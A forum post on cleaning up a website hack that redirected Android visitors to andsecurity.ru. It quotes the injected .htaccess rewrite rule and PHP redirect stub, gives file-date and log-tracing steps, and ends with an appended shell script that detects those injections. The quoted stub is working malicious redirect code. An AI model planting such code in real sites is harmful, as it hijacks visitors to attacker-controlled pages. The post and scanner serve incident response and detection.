Fli
11-16-2014, 07:31 PM
If you had any issue with your website redirecting to the hacker website andsecurity.ru,
check your hosting files' modification dates (sort by mod. date).
I found this redirect is triggered from .htaccess and from index.php; it's at the top of the file.
.htaccess
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ http://andsecurity.ru [L,R=302]
index.php
<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://andsecurity.ru");
die();
}
?>
<?php
/**
*
* @package phpBB3
* @version $Id$
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
If the user agent contains the phrase Android, then the website visitor is probably using an Android phone and it redirects him to the hacker website.
Also find files that were modified/created on the same date or around it. For this I use a Linux command like this:
find /home/myusername/public-html -type f -name "*.php*" -newermt 2014-10-12 ! -newermt 2014-10-14
(it should find files modified around 12-14 of October)
Next check your Apache access_log file and find lines that correspond to the file modification date. You may find some more details about the person who injected the code.
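
A content-based check to run alongside the date search in the post above, since it does not depend on modification times. This is an added example, not part of the original post; the function names, the 15-line window and the sample files (which use the placeholder host redirect.example) are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): content-based scan for the two
# injections shown above. Function names and sample files are constructed.

# .htaccess: a RewriteCond on %{HTTP_USER_AGENT} followed by a RewriteRule
# whose target is an absolute http(s) URL. Prints matching file paths.
scan_htaccess() {
    find "$1" -type f -name '.htaccess' -exec awk '
        { l = tolower($0) }
        l ~ /^[ \t]*rewritecond[ \t]/ && index(l, "%{http_user_agent}") { ua = 1; next }
        l ~ /^[ \t]*rewriterule[ \t]/ { if (ua && l ~ /https?:\/\//) hit = 1; ua = 0 }
        END { exit !hit }' {} \; -print
}

# PHP: within the first 15 lines (assumed window), a User-Agent read plus a
# Location header with an absolute URL; the post found the stub at the top.
scan_php() {
    find "$1" -type f -name '*.php*' -exec awk '
        NR > 15 { exit }
        { l = tolower($0) }
        index(l, "http_user_agent") { ua = 1 }
        l ~ /header\(.*location:[ \t]*https?:\/\// { loc = 1 }
        END { exit !(ua && loc) }' {} \; -print
}

# Build a constructed sample tree: one infected site, one clean site.
# Prints the temporary directory path.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/bad" "$d/good"
    printf '%s\n' 'RewriteEngine on' 'RewriteCond %{HTTP_USER_AGENT} "Android" [NC]' \
        'RewriteRule ^(.*)$ http://redirect.example [L,R=302]' > "$d/bad/.htaccess"
    printf '%s\n' 'RewriteEngine on' 'RewriteCond %{HTTP_HOST} ^www\.' \
        'RewriteRule ^(.*)$ /index.php [L]' > "$d/good/.htaccess"
    printf '%s\n' '<?php' '$ua = $_SERVER["HTTP_USER_AGENT"];' \
        'if (stripos($ua, "android") !== false) {' \
        'header("Location: http://redirect.example"); die(); }' '?>' > "$d/bad/index.php"
    printf '%s\n' '<?php' 'header("Location: /login.php");' > "$d/good/index.php"
    printf '%s\n' "$d"
}
```

Point scan_htaccess and scan_php at the web root; every path printed is a file to review by hand, because a legitimate mobile redirect matches the same pattern.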